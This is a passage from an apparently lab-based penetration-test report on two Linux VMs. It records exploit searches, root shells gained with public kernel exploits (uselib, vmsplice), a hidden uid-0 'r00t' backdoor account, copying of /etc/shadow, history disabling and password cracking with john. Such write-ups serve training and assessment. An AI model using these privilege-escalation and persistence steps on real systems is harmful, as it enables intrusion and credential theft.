TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh

111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/sshkeysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux

G. Penetration of cptvm1
i. Local exploit research via anyside.org
The list of files designated to execute as root was processed to gain

only the base name of the file. This list would be used to search
against the anyside.org exploit list.
$ awk '{ print "basename ", $4 }' suid_root_200.txt > basename_200.txt
$ chmod +x basename_200.txt
$ ./basename_200.txt | sort -u > basename-2_200.txt
$ cat basename-2_200.txt
XFree86
at
chage
chfn
chsh
crontab
gpasswd
inndstart
lppasswd
mount
newgrp
pam_timestamp_check
passwd
ping
ping6
pwdb_chkpwd
rcp
rlogin
rnews
rsh
ssh-keysign
startinnfeed
su
sudo
suexec
traceroute
traceroute6
umount
unix_chkpwd
userhelper
userisdnctl
usernetctl

The list of exploits used during the remote exploit search was re-used
to search for local exploits on the cptvm1 host.
$ grep exploits\/local exploits_list.txt | grep
2_200.txt > possible_local_200.txt
$ ll
total 1672
drwxr-xr-x
7 matt matt
238 Feb 21 14:47
drwxr-xr-x
15 matt matt
510 Feb 21 14:47
-rw-r--r-1 matt matt 126720 Feb 6 14:40
-rw-r--r-1 matt matt 702666 Sep 21 05:52
-rw-r--r-1 matt matt
1699 Feb 15 20:34
-rw-r--r-1 matt matt
9376 Feb 6 14:43

-w -i -f ../commands/basename-

./
../
exploits_list.db.tgz
exploits_list.txt
possible_local_200.txt
possible_remote_200.txt

$ cat possible_local_200.txt
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071503.txt;Rocks
Clusters <= 4.1 (mount-loop) Local Root Exploit
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071502.txt;Rocks
Clusters <= 4.1 (umount-loop) Local Root Exploit
2006-03-01;http://www.anyside.org/exp/exploits/local/2006030101.txt;Apple Mac
OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
2006-01-

25;http://www.anyside.org/exp/exploits/local/2006012501.txt;SquirrelMail 3.1
Change Passwd Plugin Local Buffer Overflow Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110903.txt;FreeBSD
(4.x , < 5.4) master.passwd Disclosure Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110902.txt;Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
2005-11-08;http://www.anyside.org/exp/exploits/local/2005110801.txt;SuSE Linux
<= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit
2005-07-04;http://www.anyside.org/exp/exploits/local/2005070403.txt;Sudo 1.3.1
- 1.6.8p Pathname Validation Local Root Exploit (openbsd)
....;http://www.anyside.org/exp/exploits/local/r57sudo.c;OpenBSD sudo 1.3.1 1.6.8p local root exploit
....;http://www.anyside.org/exp/exploits/local/x_hpux_11i_nls_cu.c;The same
vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root
shell
2004-9-19;http://www.anyside.org/exp/exploits/local/sudo-exploit.c;sudo
exploit.
2004-9-11;http://www.anyside.org/exp/exploits/local/cdrecordsuidshell.sh.txt;cdrecord $RSH exec() SUID Shell Creation
....;http://www.anyside.org/exp/exploits/local/xlock-XLOCALEDIR.c;Local root
exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using
xlock. Written to work on Redhat 7.2.

The results of the search were 13 possible exploits. The Rocks


Clusters <= 4.1 (mount-loop) Local Root Exploit, Rocks Clusters <=
4.1 (umount-loop) Local Root Exploit, Apple Mac OS X
(/usr/bin/passwd) Custom Passwd Local Root Exploit, FreeBSD (4.x ,
< 5.4) master.passwd Disclosure Exploit, SuSE Linux <= 9.3, 10
(chfn) Local Root Privilege Escalation Exploit, Sudo 1.3.1 - 1.6.8p
Pathname Validation Local Root Exploit (openbsd), OpenBSD sudo
1.3.1 - 1.6.8p local root exploit and The same vulnerability to x_hpux11i_nls_ct.c,but exploit ping command to get root shell exploits can
be ruled out as they are written for operating systems different than
the one we are on. The SquirrelMail 3.1 Change Passwd Plugin Local
Buffer Overflow Exploit and cdrecord $RSH exec() SUID Shell
Creation exploits can also be ruled out as they are for applications
that don't exist on the host.
This leaves us with 3 possible exploits: Sudo <= 1.6.8p9
(SHELLOPTS/PS4 ENV variables) Local Root Exploit, sudo exploit.
and Local root exploit utilizing the overflow in XLOCALEDIR under
XFree86 Version 4.2.x using xlock. Written to work on Redhat 7.2..
The version of Xfree86 was found to be version 4.3.0. Thus
eliminating Xfree86 from the list of potential exploits.
[cptvm1@cptvm1 commands]$ X -version
XFree86 Version 4.3.0 (Red Hat Linux release: 4.3.0-2)
Release Date: 27 February 2003
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.4.20-3bigmem i686 [ELF]
Build Date: 27 February 2003
Build Host: porky.devel.redhat.com

Before reporting problems, check http://www.XFree86.Org/


to make sure that you have the latest version.
Module Loader present
OS Kernel: Linux version 2.4.20-8 (bhcompile@porky.devel.redhat.com) (gcc
version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #1 Thu Mar 13 17:54:28 EST
2003

The version of sudo was found to be 1.6.6.


[cptvm1@cptvm1 commands]$ sudo -V
Sudo version 1.6.6

The version of sudo fits within the requirements for the Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit. So, it
was downloaded and the code reviewed. Unfortunately, this exploit
relies on an entry within the /etc/sudoers file that points to a file the
user has full access to modify. This situation does not exist on the
cptvm1 host.
The sudo exploit exploit doesn't provide enough information about its
requirements to rule it out. Attempting to download the exploit
resulted in a 404 error from the anyside.org web site. Without a more
detailed description, more research into this exploit was suspended.
ii. Local exploit research via secwatch.org
Searches for exploits of at, chage, chfn, chsh, crontab, lppasswd,
mount, newgrp, pam_timestamp_check, passwd, ping, ping6, rcp,
rlogin, rnews, rsh, sudo, suexec, traceroute, umount, unix_chckpwd,
userhelper and xfree86 returned quite a number of results. Most of
the exploits were eliminated due to mismatches on the operating
system or version. The remaining exploits, 24 exploits in total, were
downloaded, reviewed, compiled and tested. It should be noted that
the gcc compiler on the cptvm1 host was named gcc296. To make
things easier, a bin directory was created within the cptvm1 user's
home directory, a symbolic link named gcc was created for gcc296 and
the bin directory was added to the PATH. No successful exploits for
the executables listed above were found.
A search for inndstart provided an interesting exploit. Instead of a
typical buffer overflow exploit, this exploit was caused by a poorly
planned application feature. An environment variable named INNCONF
can be defined to point to the location of the inn.conf configuration file.
This enables a local user with access to the inndstart program to
create their own innd.conf file with a "pathrun" component pointing to
a directory owned by root and defining a program of their choosing to
be executed as root.

While this exploit sounded promising, the ability to change the


ownership of a directory/file to root is limited on the cptmv1 host.
Ultimately, ruling this exploit out.
iii. Privilege escalation using a Kernel VMA exploit
Overall, the secwatch.org site provides a search mechanism that is
superior to anyside.org. The secwatch.org search aggregates exploit
search results from several other sites into a single result page.
Unfortunately, the search mechanism only appears to work optimally
with single words. In several cases, a search using multiple words
received no results back from secwatch.org. However, when the same
search string was entered directly on a site, multiple exploits were
found.
With the issues found with the search mechanism of secwatch.org, a
switch to milw0rm.com as the primary search site was made. The
quality of the exploit code on milw0rm.com appears to be quite a bit
better than the code on the other sites that were searched.
A search on milw0rm.com for linux kernel 2.4 resulted in the
following exploits.

Illustration 1: Milw0rm search results for "linux kernel 2.4".


Immediately, the Linux Kernel 2.4.x-2.6.x Assembler Inline Function
Local DoS Exploit exploit can be removed from the list as it isn't a
root exploit. The Linux Kernel 2.4.22 "do_brk()" local Root Exploit
(PoC) exploit can also be removed as the kernel version in use is
2.4.20.

This left 5 exploits, Linux Kernel 2.4/2.6 x86-64 System Call


Emulation Exploit, Linux Kernel 2.4/2.6 bluez Local Root Privilege
Escalation Exploit (update), Linux Kernel 2.4.x / 2.6.x uselib() Local
Privilege Escalation Exploit, Linux Kernel 2.4 uselib() Privilege
Elevation Exploit and Linux Kernel 2.4.x mremap() bound checking
Root Exploit. The exploits were taken in order, compiled and
executed.
The Tim Hsu, 2005-01-27, Linux Kernel 2.4 uselib() Privilege
Elevation Exploit resulted in a shell with root access.
[cptvm1@cptvm1 kernel-uselib]$ gcc -o uselib uselib.c
[cptvm1@cptvm1 kernel-uselib]$ ll
total 56
drwxr-xr-x
2 cptvm1
cptvm1
4096 Jan 28 02:10
drwxr-xr-x
42 cptvm1
cptvm1
4096 Feb 14 2009
-rwxrwxr-x
1 cptvm1
cptvm1
27027 Jan 28 02:10
-rw-r--r-1 cptvm1
cptvm1
18774 Feb 14 2009
[cptvm1@cptvm1 kernel-uselib]$ ./uselib

./
../
uselib*
uselib.c

[+] SLAB cleanup


child 1 VMAs 32
[+] moved stack bfffd000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcfc00000 - 0xdf548000
Wait... [+] race won maps=58028
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd096c000
[+] gate modified ( 0xffec9523 0x0804ec00 )
[+] exploited, uid=0
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(cptvm1)
sh-2.05b#

iv. Maintaining access via creation of a new r00t account


After the successful use of the Kernel VMA exploit, consistent root
access to the cptvm1 host was required.
The creation of a new user account having the same user id and group
id as the real root account was accomplished via the standard linux
useradd script. After the creation of the account, the password was
set to expl0ited. While setting the password to a variant of a
dictionary word seemed like a good idea, this caused the shadow
password cracking phase to take quite a bit longer.
sh-2.05b# env
TERM=vt100
PWD=/home/cptvm1/cpt/exploits/kernel-uselib
SHLVL=1
HISTFILE=/dev/null
_=/bin/env
sh-2.05b# export PATH=/usr/bin:/usr/sbin:/bin:/sbin
sh-2.05b# useradd -u 0 -o -g 0 -d /root r00t

sh-2.05b# passwd r00t


Changing password for user r00t.
New password:
BAD PASSWORD: it is based on a dictionary word
Retype new password:
passwd: all authentication tokens updated successfully.
sh-2.05b#

v. Gathering the shadow password file


With the successful creation of a method to gain root access in the
future, the gathering of the shadow password file could be
accomplished. In this case, the shadow password file was copied
within the shell created by the Kernel VMA exploit. However, it could
have also been gathered via the new r00t account. While not
required, the groups shadow file was also copied.
sh-2.05b# cp /etc/shadow /tmp
sh-2.05b# cp /etc/gshadow /tmp
sh-2.05b# chmod a+rw /tmp/shadow
sh-2.05b# chmod a+rw /tmp/gshadow
sh-2.05b# cd /tmp
sh-2.05b# ls -alF gshadow shadow
-rw-rw-rw1 root
root
-rw-rw-rw1 root
root
sh-2.05b#

512 Feb 15 02:15 gshadow


1206 Feb 15 02:15 shadow

H. Cracking passwords of the cptvm1 host


i. Cracking of user, cptvm1 and cptvm2
With full access to the shadow password file, the process of cracking
the passwords contained within was started.
In this case, the john utility was used. Within a few minutes the
passwords for the user, cptvm1 and cptvm2 user accounts were
cracked (not really required as they had already been brute forced).
However, the root and r00t accounts took quite a bit longer to crack.
While the john session named cptvm1 was left to run, research on
exploits for the cptvm2 host was started.
bt cptvm1 # john --session=cptvm1 shadow
Loaded 5 password hash (FreeBSD MD5 [32/32])
digital
(user)
windows
(cptvm1)
linux
(cptvm2)
guesses: 3 time: 0:05:24:14 (3) c/s: 5722 trying: tubt
Session aborted
bt cptvm1 # john -show shadow
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
3 password hashes cracked, 2 left

bt cptvm1 # john --session=cptvm1 --users=root shadow


Loaded 1 password hash (FreeBSD MD5 [32/32])

I. Penetration of cptvm2
i. Privilege escalation using a Kernel vmsplice exploit
Since the cptvm1 host fell to a kernel exploit, time was not spent
researching third party applications and system utility exploits on the
cptvm2 host. A search on milw0rm.com for linux kernel 2.6 resulted
in the following exploits.

Illustration 2: Milw0rm search results for "linux kernel 2.6".


Immediately, the Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1
Local DoS Exploit, Linux Kernel 2.6.x sys_timer_create() Local Denial
of Service Exploit and Linux Kernel 2.6.x Firewall Logging Rules
Remote DoS Exploit exploits can be removed from the list as they
aren't root exploits. In addition, the Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit, Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit (2), Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit (3), Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit (4), Linux Kernel 2.6.13 <= 2.6.17.4
prctl() Local Root Exploit (logrotate) and Linux Kernel 2.6.23 - 2.6.24
vmsplice Local Root Exploit exploits can also be removed from the list
as they aren't for the 2.6.18 version of the kernel.

This left 2 exploits, Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root
Exploit and Linux Kernel 2.6.x chown() Group Ownership Alteration
Exploit. The exploits were taken in order, compiled and executed.
The qaaz, 2008-02-09, Linux Kernel 2.6.17 2.6.24.1 vmsplice Local
Root Exploit resulted in a shell with root access.
[cptvm1@localhost kernel26_vmsplice]$ ll
total 16
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed
jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ll
total 28
-rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb 7 04:05 jessica_biel_naked_in_my_bed
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ./ jessica_biel_naked_in_my_bed
----------------------------------Linux vmsplice Local Root Exploit
By qaaz
----------------------------------[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f36000 .. 0xb7f68000
[+] root
[root@localhost kernel26_vmsplice]# id
uid=0(root) gid=0(root) groups=500(cptvm1)
[root@localhost kernel26_vmsplice]#

ii. Maintaining access via creation of a new r00t account


After the successful use of the Kernel vmsplice exploit, consistent root
access to the cptvm2 host was required.
The creation of a new user account having the same user id and group
id as the real root account was accomplished via the standard linux
useradd script. After the creation of the account, the password was
set to windows. The previous password generation mistake of
setting a tough password was not repeated.
[root@localhost kernel26_vmsplice]# env
SSH_AGENT_PID=3134
HOSTNAME=localhost.localdomain
TERM=xterm
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
HISTSIZE=1000
GTK_RC_FILES=/etc/gtk/gtkrc:/home/cptvm1/.gtkrc-1.2-gnome2
WINDOWID=48234577
USER=cptvm1

LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33
;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32
:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=
00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2
=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:
*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:
SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.3075
GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socket
USERNAME=cptvm1
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/3075
PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/l
ocal/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/bin
DESKTOP_SESSION=default
MAIL=/var/spool/mail/cptvm1
GDM_XSERVER_LOCATION=local
PWD=/home/cptvm1/cpt/exploits/kernel26_vmsplice
INPUTRC=/etc/inputrc
XMODIFIERS=@im=none
LANG=en_US.UTF-8
GDMSESSION=default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=3
HOME=/home/cptvm1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=cptvm1
CVS_RSH=ssh
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbusyuVqOWjtSW,guid=f9418d49bbcbb5875e2b080cbf709f00
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0.0
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
XAUTHORITY=/tmp/.gdmI40NOU
COLORTERM=gnome-terminal
_=/usr/bin/env
[root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00t
useradd: warning: the home directory already exists.
Not copying any file from skel directory into it.
[root@localhost kernel26_vmsplice]# passwd r00t
Changing password for user r00t.
New UNIX password:
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[root@localhost kernel26_vmsplice]#

iii. Gathering the shadow password file


With the successful creation of a method to gain root access in the
future, the gathering of the shadow password file could be
accomplished. In this case, the shadow password file was copied
within the shell created by the Kernel vmsplice exploit. However, it
could have also been gathered via the new r00t account.
[root@localhost kernel26_vmsplice]# cp /etc/shadow /tmp
[root@localhost kernel26_vmsplice]# chmod a+rw /tmp/shadow
[root@localhost kernel26_vmsplice]# cd /tmp
[root@localhost tmp]# ls -alF shadow
-rw-rw-rw- 1 root root 1235 Feb 7 04:08 shadow
[root@localhost tmp]#

J. Cracking passwords of the cptvm2 host


i. Cracking of cptvm1, cptvm2, root and r00t
The cracking of the cptvm2 accounts was trivial in comparison to the
time the cptvm1 host had already taken (over 10 hours). Using only
the default dictionary within john, the entire process took just over 6
minutes to complete. This was due to the existence of the root
password within the standard john wordlist.
bt cptvm2 # john --session=cptvm2 shadow
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
admin
(root)
windows
(cptvm1)
windows
(r00t)
linux
(cptvm2)
guesses: 4 time: 0:00:06:13 (3) c/s: 4533 trying: linux
bt cptvm2 # john -show shadow
root:admin:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:windows:14282:0:99999:7:::
4 password hashes cracked, 0 left
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp

161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/sshkeysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

K. Cracking passwords of the cptvm1 host round 2


i. Cracking of root and r00t
At this point, the john utility had been running for quite some time
without success. With such a difference in the amount of john run
time between the vptvm1 and cptvm2 hosts, research into why was
begun.
Comparing the default wordlist used by john to the one that had been
used during the brute force hydra attack showed that the john wordlist
was far smaller. The original assumption was that the default john
wordlist would most likely be optimized for password cracking.
Therefore, the default wordlist was used as is.
As all of the passwords discovered so far were standard dictionary
words, it seemed logical that the rest of the passwords would most

likely be dictionary words, too. With this in mind, a larger wordlist


would be required. To generate this wordlist, the aspell master english
dictionary was dumped, cleaned up and sorted. This resulted in a
dictionary of roughly 118,000 words.
bt passwords # aspell dump master | sed s/\'//g | sort -u > matt.txt
bt passwords # wc -l matt.txt
118051 matt.txt
bt passwords # mv matt.txt 118051wordDictionary.txt
bt passwords # ll 118051wordDictionary.txt
-rw-r--r-- 1 503 503 1097205 Feb 15 23:05 118051wordDictionary.txt

With this new approach in mind, additional john sessions were created
to use the googled password.txt file and the newly generated aspell
dumped file. The results were far more impressive than anticipated.
Within 2 seconds, the password for the root account had been cracked.
bt cptvm1 # john --session=cptvm1-3 --users=root -wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
cavalry
(root)
guesses: 1 time: 0:00:00:02 100% c/s: 5511 trying: cavalry

At this point, the john session that had been started to use the
googled password.txt file as a wordlist was aborted.
bt cptvm1 # john --session=cptvm1-2 --users=root -wordlist=../passwords/passwords.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:00:00:22 100% c/s: 5502 trying: !

In addtion, the initial john session was also aborted. I want those 11
hours of my life back, certification crew! :)
bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:10:53:47 (3) c/s: 5722 trying: 35885297
Session aborted

Since we already know that the password to the r00t account is


expl0ited, this last step wasn't really required. However, to be 100%
complete, a john session was started to crack the r00t account. I
cheated and placed the expl0ited password in the wordlist. As
expected, john was able to crack the password in near record time.
bt cptvm1 # rm cptvm1.rec
bt cptvm1 # john --session=cptvm1 --users=r00t -wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
expl0ited
(r00t)
guesses: 1 time: 0:00:00:09 100% c/s: 4707 trying: expl0ited

Ultimately, all of the cptvm1 account passwords were cracked.


bt cptvm1 # john -show shadow
root:cavalry:14019:0:99999:7:::
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:expl0ited:14272:0:99999:7:::
5 password hashes cracked, 0 left
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
